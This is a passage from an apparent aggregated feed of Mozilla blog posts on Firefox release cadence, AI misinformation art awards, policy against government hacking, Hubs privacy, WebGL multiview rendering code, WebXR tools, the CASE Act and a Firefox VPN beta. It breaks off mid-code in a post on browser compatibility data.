There’s a balance between how much information a platform needs to validate identities and how much data users must provide. When possible, the collection of personal information should be minimized.

Mozilla Hubs is an open source social VR platform—come try it out at hubs.mozilla.com or contribute here. Read more about privacy in Hubs here.

hacks.mozilla.orgMoving Firefox to a faster 4-week release cycle

Editor’s Note: Wednesday, 10:40am PT. We’ve updated this post with the following correction: The SeaMonkey Project consumes Firefox releases, not SpiderMonkey, which is Firefox’s JavaScript engine. Thanks to an astute reader for noticing.


We typically ship a major Firefox browser (Desktop and Android) release every 6 to 8 weeks. Building and releasing a browser is complicated and involves many players. To optimize the process, and make it more reliable for all users, over the years we’ve developed a phased release strategy that includes ‘pre-release’ channels: Firefox Nightly, Beta, and Developer Edition. With this approach, we can test and stabilize new features before delivering them to the majority of Firefox users via general release.

Today’s announcement

And today we’re excited to announce that we’re moving to a four-week release cycle! We’re adjusting our cadence to increase our agility, and bring you new features more quickly. In recent quarters, we’ve had many requests to take features to market sooner. Feature teams are increasingly working in sprints that align better with shorter release cycles. Considering these factors, it is time we changed our release cadence.

Starting Q1 2020, we plan to ship a major Firefox release every 4 weeks. Firefox ESR release cadence (Extended Support Release for the enterprise) will remain the same. In the years to come, we anticipate a major ESR release every 12 months with 3 months support overlap between new ESR and end-of-life of previous ESR. The next two major ESR releases will be ~June 2020 and ~June 2021.

Shorter release cycles provide greater flexibility to support product planning and priority changes due to business or market requirements. With four-week cycles, we can be more agile and ship features faster, while applying the same rigor and due diligence needed for a high-quality and stable release. Also, we put new features and implementation of new Web APIs into the hands of developers more quickly. (This is what we’ve been doing recently with CSS spec implementations and updates, for instance.)

In order to maintain quality and minimize risk in a shortened cycle, we must:

  • Ensure Firefox engineering productivity is not negatively impacted.
  • Speed up the regression feedback loop from rollout to detection to resolution.
  • Be able to control feature rollout based on release readiness.
  • Ensure adequate testing of larger features that span multiple release cycles.
  • Have clear, consistent mitigation and decision processes.

Firefox rollouts and feature experiments

Given a shorter Beta cycle, support for our pre-release channel users is essential, including developers using Firefox Beta or Developer Edition. We intend to roll out fixes to them as quickly as possible. Today, we produce two Beta builds per week. Going forward, we will move to more frequent Beta builds, similar to what we have today in Firefox Nightly.

Staged rollouts of features will be a continued best practice. This approach helps minimize unexpected (quality, stability or performance) disruptions to our release end-users. For instance, if a feature is deemed high-risk, we will plan for slow rollout to end-users and turn the feature off dynamically if needed.

We will continue to foster a culture of feature experimentation and A/B testing before rollout to release. Currently, the duration of experiments is not tied to a release cycle length and therefore not impacted by this change. In fact, experiment length is predominantly a factor of time needed for user enrollment, time to trigger the study or experiment and collect the necessary data, followed by data analysis needed to make a go/no-go decision.

Despite the shorter release cycles, we will do our best to localize all new strings in all locales supported by Firefox. We value our end-users from all across the globe. And we will continue to delight you with localized versions of Firefox.

Firefox release schedule 2019 – 2020

Firefox engineering will deploy this change gradually, starting with Firefox 71. We aim to achieve a 4-week release cadence by Q1 2020. The table below lists Firefox versions and planned launch dates. Note: these are subject to change for business reasons.

a table showing the release dates for Firefox GA and pre-release channels, 2019-2020

Process and product quality metrics

As we slowly reduce our release cycle length, from 7 weeks down to 6, 5, 4 weeks, we will monitor closely. We’ll watch aspects like release scope change; developer productivity impact (tree closure, build failures); beta churn (uplifts, new regressions); and overall release stabilization and quality (stability, performance, carryover regressions). Our main goal is to identify bottlenecks that prevent us from being more agile in our release cadence. Should our metrics highlight an unexpected trend, we will put in place appropriate mitigations.

Finally, projects that consume Firefox mainline or ESR releases, such as SeaMonkey and Tor, will have to release more frequently if they wish to stay current with Firefox. Each of these Firefox releases will contain fewer changes, so they should be correspondingly easier to integrate. The 4-week releases of Firefox will be the most stable, fastest, and best-quality builds.

In closing, we hope you’ll enjoy the new faster cadence of Firefox releases. You can always refer to https://wiki.mozilla.org/Release_Management/Calendar for the latest release dates and other information. Got questions? Please send email to release-mgmt@mozilla.com.

The post Moving Firefox to a faster 4-week release cycle appeared first on Mozilla Hacks - the Web developer blog.

The Mozilla BlogExamining AI’s Effect on Media and Truth

Mozilla is announcing its eight latest Creative Media Awards. These art and advocacy projects highlight how AI intersects with online media and truth — and impacts our everyday lives


Today, one of the biggest issues facing the internet — and society — is misinformation.

It’s a complicated issue, but this much is certain: The artificial intelligence (AI) powering the internet is complicit. Platforms like YouTube and Facebook recommend and amplify content that will keep us clicking, even if it’s radical or flat out wrong.

Earlier this year, Mozilla called for art and advocacy projects that illuminate the role AI plays in spreading misinformation. And today, we’re announcing the winners: Eight projects that highlight how AI like machine learning impacts our understanding of the truth.

These eight projects will receive Mozilla Creative Media Awards totalling $200,000, and will launch to the public by May 2020. They include a Turing Test app; a YouTube recommendation simulator; educational deepfakes; and more. Awardees hail from Japan, the Netherlands, Uganda, and the U.S. Learn more about each awardee below.

Mozilla’s Creative Media Awards fuel the people and projects on the front lines of the internet health movement. Past Creative Media Award winners have built mock dating apps that highlight algorithmic discrimination; they’ve created games that simulate the inherent bias of automated hiring; and they’ve published clever tutorials that mix cosmetic advice with cybersecurity best practices.

These eight awards align with Mozilla’s focus on fostering more trustworthy AI.

The winners


[1] Truth-or-Dare Turing Test | by Foreign Objects in the U.S.

This project explores deceptive AI that mimics real humans. Users play truth-or-dare with another entity and, at the end of the game, must guess whether they were playing with a fellow human or an AI. (“Truths” are played out using text, and “dares” using an online sketchpad.) The project also includes a website outlining the state of mimicry technology, its uses, and its dangers.


[2] Swap the Curators in the Tube | by Tomo Kihara in Japan

This project explores how recommendation engines present different realities to different people. Users will peruse the YouTube recommendations of five wildly different personas — including a conspiracist and a racist persona — to experience how their recommendations differ.


[3] An Interview with ALEX | by Carrie Wang in the U.S.

The project is a browser-based experience that simulates a job interview with an AI in a future of gamified work and total surveillance. As the interview progresses, users learn that this automated HR manager is covering up the truth of this job, and using facial and speech recognition to make assumptions and decisions about them.


[4] The Future of Memory | by Xiaowei Wang, Jasmine Wang, and Yang Yuting in the U.S.

This project explores algorithmic censorship, and the ways language can be made illegible to such algorithms. It reverse-engineers how automated censors work, to provide a toolkit of tactics using a new “machine resistant” language, composed of emoji, memes, steganography and homophones. The project will also archive censored materials on a distributed, physical network of offline modules.


[5] Choose Your Own Fake News | by Pollicy in Uganda

This project uses comics and audio to explore how misinformation spreads across the African continent. Users engage in a choose-your-own-adventure game that simulates how retweets, comments, and other digital actions can sow misinformation, and how that misinformation intersects with gender, religion, and ethnicity.



[6] Deep Reckonings | by Stephanie Lepp in the U.S.

This project uses deepfakes to address the issue of deepfakes. Three false videos will show public figures — like tech executives — reckoning with the dangers of synthetic media. Each video will be clearly watermarked and labeled as a deepfake to prevent misinformation.


[7] In Event of Moon Disaster | by Halsey Burgund, Francesca Panetta, Magnus Bjerg Mortensen, Jeff DelViscio and the MIT Center for Advanced Virtuality

This project uses the 1969 moon landing to explore the topic of modern misinformation. Real coverage of the landing will be presented on a website alongside deepfakes and other false content, to highlight the difficulty of telling the two apart. And by tracking viewers’ attention, the project will reveal which content captivated viewers more.


[8] Most FACE Ever | by Kyle McDonald in the U.S.

This project teaches users about computer vision and facial analysis technology through playful challenges. Users will enable their webcam, engage with facial analysis, and try to “look” a certain way — say, “criminal,” or “white.” The game reveals how inaccurate and biased facial analysis can often be.

These eight awardees were selected based on quantitative scoring of their applications by a review committee and a qualitative discussion at a review committee meeting. Committee members included Mozilla staff, current and alumni Mozilla Fellows and Awardees, and outside experts. The selection criteria were designed to evaluate the merits of the proposed approach; diversity in applicant background, past work, and medium was also considered.

These awards are part of the NetGain Partnership, a collaboration between Mozilla, Ford Foundation, Knight Foundation, MacArthur Foundation, and the Open Society Foundation. The goal of this philanthropic collaboration is to advance the public interest in the digital age.

Also see (May 2019): Seeking Art that Explores AI, Media, and Truth

The post Examining AI’s Effect on Media and Truth appeared first on The Mozilla Blog.

Open Policy & AdvocacyGovernments should work to strengthen online security, not undermine it

On Friday, Mozilla filed comments in a case brought by Privacy International in the European Court of Human Rights involving government “computer network exploitation” (“CNE”)—or, as it is more colloquially known, government hacking.

While the case focuses on the direct privacy and freedom of expression implications of UK government hacking, Mozilla intervened in order to showcase the further, downstream risks to users and internet security inherent in state CNE. Our submission highlights the security and related privacy threats from government stockpiling and use of technology vulnerabilities and exploits.

Government CNE relies on the secret discovery or introduction of vulnerabilities—i.e., bugs in software, computers, networks, or other systems that create security weaknesses. “Exploits” are then built on top of the vulnerabilities. These exploits are essentially tools that take advantage of vulnerabilities in order to overcome the security of the software, hardware, or system for purposes of information gathering or disruption.

When such vulnerabilities are kept secret, they can’t be patched by companies, and the products containing the vulnerabilities continue to be distributed, leaving people at risk. The problem arises because no one—including government—can perfectly secure information about a vulnerability. Vulnerabilities can be and are independently discovered by third parties and inadvertently leaked or stolen from government. In these cases where companies haven’t had an opportunity to patch them before they get loose, vulnerabilities are ripe for exploitation by cybercriminals, other bad actors, and even other governments,1 putting users at immediate risk.

This isn’t a theoretical concern. For example, the findings of one study suggest that, within a year, vulnerabilities undisclosed by a state intelligence agency may be rediscovered up to 15% of the time.2 Moreover, one of the worst cyberattacks in history was caused by a vulnerability and exploit stolen from the NSA in 2017 that affected computers running Microsoft Windows.3 The devastation wreaked through use of that tool continues apace today.4

This example also shows how damaging it can be when vulnerabilities impact products that are in use by tens or hundreds of millions of people, even if the actual government exploit was only intended for use against one or a handful of targets.

As more and more of our lives are connected, governments and companies alike must commit to ensuring strong security. Yet state CNE significantly contributes to the prevalence of vulnerabilities that are ripe for exploitation by cybercriminals and other bad actors and can result in serious privacy and security risks and damage to citizens, enterprises, public services, and governments. Mozilla believes that governments can and should contribute to greater security and privacy for their citizens by minimizing their use of CNE and disclosing vulnerabilities to vendors as they find them.

2. https://www.belfercenter.org/sites/default/files/files/publication/Vulnerability%20Rediscovery%20(belfer-revision).pdf

The post Governments should work to strengthen online security, not undermine it appeared first on Open Policy & Advocacy.

QMOFirefox 70 Beta 6 Testday Results

Hello Mozillians!

As you may already know, on Friday, September 13th, we held a new Testday event for Firefox 70 Beta 6.

Thank you all for helping us make Mozilla a better place: Gabriela (gaby2300), Dan Caseley (Fishbowler) and Aishwarya Narasimhan!

Result: Several test cases were executed for Protection Report and Privacy Panel UI Updates.

Thanks for another awesome testday, we appreciate your contribution! 🙂

We hope to see you all in our next events, keep an eye on QMO.

We will make announcements as soon as something shows up!


Mozilla VR BlogCreating privacy-centric virtual spaces

We now live in a world with instantaneous communication unrestrained by geography. While a generation ago, we would be limited by the speed of the post, now we’re limited by the speed of information on the Internet. This has changed how we connect with other people.

As immersive devices become more affordable, social spaces in virtual reality (VR) will become more integrated into our daily lives and interactions with friends, family, and strangers. Social media has enabled rapid pseudonymous communication, which can be directed at both a single person and large groups. If social VR is the next evolution of this, what approaches will result in spaces that respect user identities, autonomy, and safety?

We need spaces that reflect how we interact with others on a daily basis.

Social spaces: IRL and IVR

Often, when people think about social VR, what tends to come to mind are visions from the worlds of science fiction stories: Snow Crash, Ready Player One, The Matrix - huge worlds that involve thousands of strangers interacting virtually on a day-to-day basis. In today’s social VR ecosystem, many applications take a similarly public approach: new users are often encouraged (or forced) by the system to interact with new people in the name of developing relationships with strangers who are also participating in the shared world. This can result in more dynamic and populated spaces, but in a way that doesn’t map onto our familiar, real-world interactions.

This approach doesn’t mirror our usual day-to-day experiences—instead of spending time with strangers, we mostly interact with people we know. Whether we’re in a private, semi-public, or public space, we tend to stick to familiarity. We can define the privacy of a space by thinking about who has access to a location, and the degree to which there is established trust among the other people you encounter there.

Private: a controlled space where all individuals are known to each other. In the physical world, your home is an example of a private space—you know anyone invited into your home, whether they’re a close associate or a passing acquaintance (like a plumber).
Semi-public: a semi-controlled space where all individuals are associated with each other. For example, you might not know everyone in your workplace, but you’re all connected via your employer.
Public: a public space made up of a lot of different, separate groups of people who might not have established relationships or connections. In a restaurant, while you know the group you’re dining with, you likely don’t know anyone else.

Creating privacy-centric virtual spaces

While we might encounter strangers in public or semi-public spaces, most of our interactions are still with people we know. This should extend to the virtual world. However, VR devices haven’t been widely available until recently, so most companies building virtual worlds have designed their spaces in a way that prioritizes getting people in the same space, regardless of whether or not those users already know each other.

For many social VR systems, the platform hosting spaces often networks different environments and worlds together and provides a centralized directory of user-created content to go explore. While this type of discovery has its benefits, in the physical world we largely spend time with the same people from day to day. Why don’t we design a social platform around this?

Mozilla Hubs is a social VR platform created to provide spaces that more accurately emulate our IRL interactions. Instead of hosting a connected, open ecosystem, users create their own independent, private-by-default rooms. This creates a world where instead of wandering into others’ spaces, you intentionally invite people you know into your space.

Private by default

Communities and societies often establish their own cultural norms, signals, inside jokes, and unspoken (or written) rules — these carry over to online spaces. It can be difficult for people to be thrown into brand-new groups of users without this understanding, and there are often no guarantees that the people you’ll be interacting with in these public spaces will be receptive to other users who are joining. In contrast to these public-first platforms, we’ve designed our social VR platform, Hubs, to be private by default. This means that instead of being in an environment with strangers from the outset, Hubs rooms are designed to be private to the room owner, who can then choose who they invite into the space with the room access link.

Protecting public spaces

When we’re in public spaces, we have different sets of implied rules than the social norms that we might abide by when we’re in private. In virtual spaces, these rules aren’t always as clear and different people will behave differently in the absence of established rules or expectations. Hubs allows communities to set up their own public spaces, so that they can bring their own social norms into the spaces. When people are meeting virtually, it’s important to consider the types of interactions that you’re encouraging.

Because access to a Hubs room is predicated on having the invitation URL, the degree to which that link is shared by the room owner or visitors to the room will dictate how public or private a space is. If you know that the only people in a Hubs room are you and two of your closest friends, you probably have a pretty good sense of how the three of you interact together. If you’re hosting a meetup and expecting a crowd, those behaviors can be less clear. Without intentional community management practices, virtual spaces can turn ugly. Here are some things that you could consider to keep semi-public or public Hubs rooms safe and welcoming:

  • Keep the distribution of the Hubs link limited to known groups of trusted individuals and consider using a form or registration to handle larger events.
  • Use an integration like the Hubs Discord Bot to tie users to a known identity. Removing users from a linked Discord channel also removes their ability to enter an authenticated Hubs room.
  • Lock down room permissions to limit who can create new objects in the room or draw with the pen tool.
  • Create a code of conduct or set of community guidelines that are posted in the Hubs room near the room entry point.
  • Assign trusted users to act as moderators, so someone is available in the space to help welcome visitors and enforce positive conduct.

We need social spaces that respect and empower participants. Here at Mozilla, we’re creating a platform that more closely reflects how we interact with others IRL. Our spaces are private by default, and Hubs allows users to control who enters their space and how visitors can behave.

Mozilla Hubs is an open source social VR platform—come try it out at hubs.mozilla.com or contribute here.

Read more about safety and identity in Hubs here.

Mozilla VR BlogMultiview on WebXR

The WebGL multiview extension is already available in several browsers and 3D web engines, and it can easily improve the performance of your WebXR application.

What is multiview?

When VR first arrived, many engines supported stereo rendering by running all the render stages twice, once for each camera/eye. While this works, it is highly inefficient.

for (eye in eyes)
    renderScene(eye)

Here renderScene sets up the viewport, shaders, and state every time it is called. This doubles the cost of rendering every frame.

Later on, some optimizations started to appear in order to improve the performance and minimize the state changes.

for (object in scene)
    for (eye in eyes)
        renderObject(object, eye)

Even if we reduce the number of state changes, by switching programs and grouping objects, the number of draw calls remains the same: two times the number of objects.

In order to minimize this bottleneck, the multiview extension was created. The TL;DR of this extension: with just one draw call you can draw to multiple targets, reducing the per-view overhead.

This is done by extending your shader uniforms with the information for each view and indexing them with the gl_ViewID_OVR built-in, similar to how the instancing API works.

#extension GL_OVR_multiview2 : require
layout(num_views = 2) in;
in vec4 inPos;
uniform mat4 u_viewMatrices[2];
void main() {
    gl_Position = u_viewMatrices[gl_ViewID_OVR] * inPos;
}

The resulting render loop with the multiview extension will look like:

for (object in scene)
    setUniformsForBothEyes() // Left/Right camera matrices
    renderObject(object)     // a single draw call renders both views

This extension can be used to speed up multiple tasks, such as cascaded shadow maps, rendering cubemaps, or rendering multiple viewports as in CAD software, although the most common use case is stereo rendering.

Stereo rendering is also our main target, as this will improve the VR rendering path performance with just a few modifications in a 3D engine. Currently, most headsets have two views, but there are prototypes of headsets with ultra-wide FOV using four views, which is currently the maximum number of views supported by multiview.

Multiview in WebGL

Once the OpenGL OVR_multiview2 specification was created, the WebGL working group started to make a WebGL version of this API.

It’s been a while since our first experiment supporting multiview on Servo and three.js. Back then it was quite a challenge to support WEBGL_multiview: it was based on opaque framebuffers and could be used with WebGL1, but the shaders needed to be compiled with GLSL 3.00 support, which was only available in WebGL2, so some hacks on the Servo side were needed to get it running.
At that time the WebVR spec had a proposal to support multiview, but it was not approved.

Thanks to the work of the WebGL WG, the multiview situation has improved a lot in the last few months. The specification has already reached Community Approved status, which means that browsers can ship it enabled by default (as we do in Firefox Desktop 70 and Firefox Reality 1.4).

Some important restrictions of the final specification to notice:

  • It only supports WebGL2 contexts, as it needs GLSL 3.00 and texture arrays.
  • Currently there is no way to use multiview to render to a multisampled backbuffer, so you should create contexts with antialias: false. (The WebGL WG is working on a solution for this)
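For readers who want to try the extension directly, the setup boils down to requesting OVR_multiview2 on a WebGL2 context and attaching a texture array, with one layer per view, to a framebuffer. Here is a minimal sketch; the helper function and its name are our own invention, while the extension call itself comes from the specification:

```javascript
// Minimal multiview framebuffer setup. Returns null when the
// extension is unavailable so callers can fall back to two-pass rendering.
function createMultiviewFramebuffer(gl, width, height, numViews) {
  const ext = gl.getExtension('OVR_multiview2');
  if (!ext) return null;

  // The color attachment is a 2D texture array with one layer per view.
  const colorTex = gl.createTexture();
  gl.bindTexture(gl.TEXTURE_2D_ARRAY, colorTex);
  gl.texStorage3D(gl.TEXTURE_2D_ARRAY, 1, gl.RGBA8, width, height, numViews);

  const fb = gl.createFramebuffer();
  gl.bindFramebuffer(gl.DRAW_FRAMEBUFFER, fb);
  // Attach all layers in a single call; each view (gl_ViewID_OVR in the
  // shader) renders into its own layer of the texture array.
  ext.framebufferTextureMultiviewOVR(
    gl.DRAW_FRAMEBUFFER, gl.COLOR_ATTACHMENT0, colorTex, 0, 0, numViews);

  return { framebuffer: fb, colorTexture: colorTex, ext: ext };
}
```

The render loop then binds this framebuffer once and issues a single draw call per object; the shader selects the per-view matrix with gl_ViewID_OVR.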

Web engines with multiview support

We have been working for a while on adding multiview support to three.js (PR). Currently it is possible to get the benefits of multiview automatically as long as the extension is available and you define a WebGL2 context without antialias:

var context = canvas.getContext( 'webgl2', { antialias: false } );
renderer = new THREE.WebGLRenderer( { canvas: canvas, context: context } );

You can see a three.js example using multiview here (source code).

A-Frame is based on three.js, so it should get multiview support as soon as it updates to the latest release.

Babylon.js has supported OVR_multiview2 for a while (more info).

For details on how to use multiview directly, without any third-party engine, you can take a look at the three.js implementation, see the specification’s sample code, or read this tutorial by Oculus.

Browsers with multiview support

The extension was recently approved by the community, so we expect all major browsers to add support for it by default soon.

  • Firefox Desktop: Firefox 71 will support multiview enabled by default. In the meantime, you can test it on Firefox Nightly by enabling draft extensions.
  • Firefox Reality: It’s already enabled by default since version 1.3.
  • Oculus Browser: It’s implemented but disabled by default, you must enable Draft WebGL Extension preference in order to use it.
  • Chrome: You can use it on Chrome Canary for Windows by running it with the following command line parameters: --use-cmd-decoder=passthrough --enable-webgl-draft-extensions

Performance improvements

Most WebGL and WebXR applications are CPU-bound: the more objects you have in the scene, the more draw calls you submit to the GPU. In our benchmarks for stereo rendering with two views, we got a consistent improvement of ~40% compared to traditional rendering.
As you can see in the following chart, the more cubes (draw calls) you have to render, the bigger the benefit of multiview.

What’s next?

The main drawback of the current multiview extension is that there is no way to render to a multisampled backbuffer, so to use it with WebXR you must set antialias: false when creating the context. However, this is something the WebGL WG is working on.

As soon as they come up with a proposal and it is implemented by browsers, 3D engines should support it automatically. Hopefully, we will see new extensions arriving in the WebGL and WebXR ecosystem to improve the performance and quality of rendering, such as the ones exposed by Nvidia VRWorks (e.g., Variable Rate Shading and Lens Matched Shading).



* Header image by Nvidia VRWorks

Mozilla VR BlogFirefox Reality 1.4

Firefox Reality 1.4 is now available for users in the Viveport and Oculus stores.

With this release, we’re excited to announce that users can enjoy browsing in multiple windows side-by-side. Each window can be set to the size and position of your choice, for a super customizable experience.

And, by popular demand, we’ve enabled local browsing history, so you can get back to sites you've visited before without typing. Sites in your history will also appear as you type in the search bar, so you can complete the address quickly and easily. You can clear your history or turn it off anytime from within Settings.

The Content Feed also has a new and improved menu of hand-curated “Best of WebVR” content for you to explore. You can look forward to monthly updates featuring a selection of new content across different categories including Animation, Extreme (sports/adrenaline/adventure), Music, Art & Experimental and our personal favorite way to wind down a day, 360 Chill.

Additional highlights

  • Movable keyboard, so you can place it where it’s most comfortable to type.
  • Tooltips on buttons and actions throughout the app.
  • Updated look and feel for the Bookmarks and History views so you can see and interact better at all window sizes.
  • An easy way to request the desktop version of a site that doesn’t display well in VR, right from the search bar.
  • Updated and reorganized settings to be easier to find and understand.
  • Added the ability to set a preferred website language order.

Full release notes can be found in our GitHub repo here.

Stay tuned as we keep improving Firefox Reality! We’re currently working on integrating your Firefox Account so you’ll be able to easily send tabs to and from VR from other devices. New languages and copy/paste are also coming soon, in addition to continued improvements in performance and stability.

Firefox Reality is available right now. Go and get it!
Download for Oculus Go
Download for Oculus Quest
Download for Viveport (Search for Firefox Reality in Viveport store)

Mozilla VR BlogWebXR emulator extension

We are happy to announce the release of our WebXR emulator browser extension which helps WebXR content creation.

We understand that developing and debugging WebXR experiences is hard for many reasons:

  • You must own a physical XR device
  • Lack of support for XR devices on some platforms, such as macOS
  • Putting on and taking off the headset all the time is an uncomfortable task
  • In order to make your app responsive across form factors, you must own tons of devices: mobile, tethered, 3dof, 6dof, and so on

With this extension, we aim to soften most of these issues.

The WebXR emulator extension emulates XR devices so that you can enter immersive (VR) mode directly from your desktop browser and test your WebXR application without any physical XR device. It emulates multiple XR devices, so you can select which one you want to test.

The extension is built on top of the WebExtensions API, so it works on Firefox, Chrome, and other browsers supporting the API.

How can I use it?

  1. Install the extension from the extension stores (Firefox, Chrome)
  2. Launch a WebXR application, for example the Three.js examples. You will notice that the application detects that you have a VR device (emulated) and it will let you enter the immersive (VR) mode.
  3. Open the “WebXR” tab in the browser’s developer tool (Firefox, Chrome) to control the emulated device. You can move the headset and controllers and trigger the controller buttons. You will see their transforms reflected in the WebXR application.
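Under the hood, "detecting the (emulated) device" is just the standard WebXR feature-detection path. Here is a minimal sketch; the function name is ours, and navigator.xr is passed in as a parameter so the snippet can be exercised outside a browser:

```javascript
// Ask the WebXR implementation (real or emulated) whether an
// immersive VR session is available, and start one if so.
async function enterVRIfAvailable(xr, onSession) {
  if (!xr) return false;                               // WebXR not present at all
  const supported = await xr.isSessionSupported('immersive-vr');
  if (!supported) return false;                        // no (emulated) VR device
  const session = await xr.requestSession('immersive-vr');
  onSession(session);                                  // hand off to the render loop
  return true;
}
```

With the extension installed, isSessionSupported resolves to true on a plain desktop browser, which is exactly what lets the Three.js examples show their "Enter VR" button.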

What’s next?

The development of this extension is still at an early stage. We have many awesome features planned, including:

  • Recording and replaying of actions and movements of your XR devices so you don’t have to replicate them every time you want to test your app and can share them with others.
  • Incorporate new XR devices
  • Control the headset and controllers using a standard gamepad like the Xbox or PS4 controllers or use your mobile as 3dof device
  • Something else?

We would love your feedback! What new features do you want next? Any problems with the extension on your WebXR application? Please join us on GitHub to discuss them.

Lastly, we would like to give a shout out to the WebVR API emulation Extension by Jaume Sanchez as it was a true inspiration for us when building this one.

Open Policy & AdvocacyCASE Act Threatens User Rights in the United States

This week, the House Judiciary Committee is expected to mark up the Copyright Alternative in Small Claims Enforcement (CASE) Act of 2019 (H.R. 2426). While the bill is designed to streamline the litigation process, it will impose severe costs upon users and the broader internet ecosystem. More specifically, the legislation would create a new administrative tribunal for claims with limited legal recourse for users, incentivizing copyright trolling and violating constitutional principles. Mozilla has always worked for copyright reform that supports businesses and internet users, and we believe that the CASE Act will stunt innovation and chill free expression online. With this in mind, we urge members to oppose passage of H.R. 2426.

First, the tribunal created by the legislation conflicts with well-established separation of powers principles and limits due process for potential defendants. Under the CASE Act, a new administrative board would be created within the Copyright Office to review claims of infringement. However, as Professor Pamela Samuelson and Kathryn Hashimoto of Berkeley Law point out, it is not clear that Congress has the authority under Article I of the Constitution to create this tribunal. Although Congress can create tribunals that adjudicate “public rights” matters between the government and others, the creation of a board to decide infringement disputes between two private parties would represent an overextension of its authority into an area traditionally governed by independent Article III courts.

Moreover, defendants subject to claims under the CASE Act will be funneled into this process with strictly limited avenues for appeal. The legislation establishes the tribunal as a default legal process for infringement claims–defendants will be forced into the process unless they explicitly opt-out. This implicitly places the burden on the user, and creates a more coercive model that will disadvantage defendants who are unfamiliar with the nuances of this new legal system. And if users have objections to the decision issued by the tribunal, the legislation severely restricts access to justice by limiting substantive court appeals to cases in which the board exceeded its authority; failed to render a final determination; or issued a determination as a result of fraud, corruption, or other misconduct.

While the board is supposed to be reserved for small claims, the tribunal is authorized to award damages of up to $30,000 per proceeding. For many people, this supposedly “small” amount would be enough to completely wipe out their household savings. Since the forum allows for statutory damages to be imposed, the plaintiff does not even have to show any actual harm before imposing potentially ruinous costs on the defendant.

These damages awards are completely out of place in what is being touted as a small claims tribunal. As Stan Adams of the Center for Democracy and Technology notes, awards as high as $30,000 exceed the maximum awards for small claims courts in 49 out of 50 states. In some cases, they would be ten times higher than the damages available in small claims court.

The bill also authorizes the Register of Copyrights to unilaterally establish a forum for claims of up to $5,000 to be decided by a single Copyright Claims Officer, without any pre-established explicit due process protections for users. These amounts may seem negligible in the context of a copyright suit, where damages can reach up to $150,000, but nearly 40 percent of Americans cannot cover a $400 emergency today.

Finally, the CASE Act will give copyright trolls a favorable forum. In recent years, some unscrupulous actors made a business of threatening thousands of Internet users with copyright infringement suits. These suits are often based on flimsy, but potentially embarrassing, allegations of infringement of pornographic works. Courts have helped limit the worst impact of these campaigns by making sure the copyright owner presented evidence of a viable case before issuing subpoenas to identify Internet users. But the CASE Act will allow the Copyright Office to issue subpoenas with little to no process, potentially creating a cheap and easy way for copyright trolls to identify targets.

Ultimately, the CASE Act will create new problems for internet users and exacerbate existing challenges in the legal system. For these reasons, we ask members to oppose H.R. 2426.

The post CASE Act Threatens User Rights in the United States appeared first on Open Policy & Advocacy.

The Mozilla BlogFirefox’s Test Pilot Program Returns with Firefox Private Network Beta

Like a cat, the Test Pilot program has had many lives. It originally started as an Add-on before we relaunched it three years ago. Then in January, we announced that we were evolving our culture of experimentation, and as a result we closed the Test Pilot program to give us time to further explore what was next.

We learned a lot from the Test Pilot program. First, we had a loyal group of users who provided us feedback on projects that weren’t polished or ready for general consumption. Based on that input we refined and revamped various features and services, and in some cases shelved projects altogether because they didn’t meet the needs of our users. The feedback we received helped us evaluate a variety of potential Firefox features, some of which are in the Firefox browser today.

If you haven’t heard, third time’s the charm. We’re turning to our loyal and faithful users, specifically the ones who signed up for a Firefox account and opted in to hear about new product testing, and giving them first crack at test-driving new, privacy-centric products as part of the relaunched Test Pilot program. The difference this time is that these products and services may live outside the Firefox browser, and will be far more polished: just one step shy of general public release.

We’ve already earmarked a couple of new products that we plan to fine-tune before their official release as part of the relaunched Test Pilot program. Because of how much we learned from our users through the Test Pilot program, and our ongoing commitment to build our products and services to meet people’s online needs, we’re kicking off our relaunch of the Test Pilot program by beta testing our project code named Firefox Private Network.

Try our first beta – Firefox Private Network

One of the key learnings from recent events is that there is growing demand for privacy features. The Firefox Private Network is an extension which provides a secure, encrypted path to the web to protect your connection and your personal information anywhere and everywhere you use your Firefox browser.

There are many ways that your personal information and data are exposed: online threats are everywhere, whether it’s through phishing emails or data breaches. You may often find yourself taking advantage of the free WiFi at the doctor’s office, airport or a cafe. There can be dozens of people using the same network — casually checking the web and getting social media updates. This leaves your personal information vulnerable to those who may be lurking, waiting to take advantage of this situation to gain access to your personal info. Using the Firefox Private Network helps protect you from hackers lurking in plain sight on public connections.

Start testing the Firefox Private Network today; it’s currently available in the US in the Firefox desktop browser. A Firefox account allows you to be one of the first to test potential new products and services; you can sign up directly from the extension.


Key features of Firefox Private Network are:

  • Protection when in public WiFi access points – Whether you are waiting at your doctor’s office, the airport or working from your favorite coffee shop, your connection to the internet is protected when you use the Firefox browser thanks to a secure tunnel to the web, protecting all your sensitive information like the web addresses you visit, personal and financial information.
  • Internet Protocol (IP) addresses are hidden so it’s harder to track you – Your IP address is like a home address for your computer. One of the reasons why you may want to keep it hidden is to keep advertising networks from tracking your browsing history. Firefox Private Network will mask your IP address providing protection from third party trackers around the web.
  • Toggle the switch on at any time – By clicking the browser extension, you will find an on/off toggle that shows whether you are currently protected. You can turn it on at any time for additional privacy protection, or off when it’s not needed.

Your feedback on Firefox Private Network beta is important

Over the next several months you will see a number of variations on our testing of the Firefox Private Network. This iterative process will give us much-needed feedback to explore technical and possible pricing options for the different online needs that the Firefox Private Network meets.

Your feedback will be essential in making sure that we offer a full complement of services that address the problems you face online with the right-priced service solutions. We depend on your feedback and we will send a survey to follow up. We hope you can spend a few minutes to complete it and let us know what you think. Please note this first Firefox Private Network Beta test will only be available to start in the United States for Firefox account holders using desktop devices. We’ll keep you updated on our eventual beta test roll-outs in other locales and platforms.

Sign up now for a Firefox account and join the fight to keep the internet open and accessible to all.

The post Firefox’s Test Pilot Program Returns with Firefox Private Network Beta appeared first on The Mozilla Blog.

hacks.mozilla.orgCaniuse and MDN compatibility data collaboration

Web developers spend a good amount of time making web compatibility decisions. Deciding whether or not to use a web platform feature often depends on its availability in web browsers.

A brief history of compatibility data

More than 10 years ago, @fyrd created the caniuse project, to help developers check feature availability across browsers. Over time, caniuse has evolved into the go-to resource to answer the question that comes up day to day: “Can I use this?”

About 2 years ago, the MDN team started re-doing its browser compatibility tables. The team was on a mission to take the guesswork out of web compatibility. Since then, the BCD project has become a large dataset with more than 10,000 data points. It stays up to date with the help of over 500 contributors on GitHub.

MDN compatibility data is available as open data on npm and has been integrated into a variety of projects, including VS Code and webhint.io auditing.
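To give a sense of what consuming that dataset looks like, here is a sketch. The inline object mimics a simplified version of the package's shape (real entries can carry notes, flags, and arrays of ranges) so the example is self-contained, and the helper function is our own:

```javascript
// Simplified shape of one BCD entry:
// feature.__compat.support.<browser>.version_added
const bcd = {
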